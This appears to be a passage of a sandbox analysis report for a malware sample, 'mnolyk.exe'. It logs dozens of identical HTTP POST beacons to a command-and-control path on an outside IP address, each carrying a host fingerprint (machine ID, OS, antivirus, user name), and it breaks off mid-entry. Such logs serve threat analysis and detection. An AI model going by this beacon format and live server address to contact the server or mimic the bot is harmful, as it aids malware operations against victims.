                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.401182890 CET  665  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      551  192.168.2.7  50246  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:31.574487925 CET  666  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.638185024 CET  666  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      552  192.168.2.7  50247  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:31.810489893 CET  667  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:31.872325897 CET  667  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      553  192.168.2.7  50248  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:32.043751955 CET  668  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.106208086 CET  668  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      554  192.168.2.7  50249  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:32.275895119 CET  669  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.339564085 CET  669  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      555  192.168.2.7  50250  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:32.516212940 CET  670  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.580764055 CET  670  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      556  192.168.2.7  50251  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:32.760946989 CET  671  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:32.824388981 CET  671  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      557  192.168.2.7  50252  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:32.997462034 CET  672  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.064398050 CET  672  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                      558  192.168.2.7  50253  62.204.41.4  80  C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp  kBytes transferred  Direction  Data
                                                                      Feb 7, 2023 23:09:33.281755924 CET  673  OUT  POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.344080925 CET  673  IN  HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      559 | 192.168.2.7 | 50254 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:33.517905951 CET | 674 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.583132029 CET | 674 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      56 | 192.168.2.7 | 49751 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:15.127197981 CET | 171 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:15.192442894 CET | 171 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      560 | 192.168.2.7 | 50255 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:33.778377056 CET | 675 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:33.841334105 CET | 675 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      561 | 192.168.2.7 | 50256 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:34.024543047 CET | 676 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.088280916 CET | 676 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      562 | 192.168.2.7 | 50257 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:34.266479015 CET | 677 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.330198050 CET | 677 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      563 | 192.168.2.7 | 50258 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:34.513209105 CET | 678 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.576956034 CET | 678 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      564 | 192.168.2.7 | 50259 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:34.780949116 CET | 679 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:34.843144894 CET | 679 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      565 | 192.168.2.7 | 50260 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:35.014959097 CET | 680 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.082820892 CET | 680 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      566 | 192.168.2.7 | 50261 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:35.263576984 CET | 681 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.330900908 CET | 681 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      567 | 192.168.2.7 | 50262 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:35.513957977 CET | 682 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:35.580169916 CET | 682 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      568 | 192.168.2.7 | 50263 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
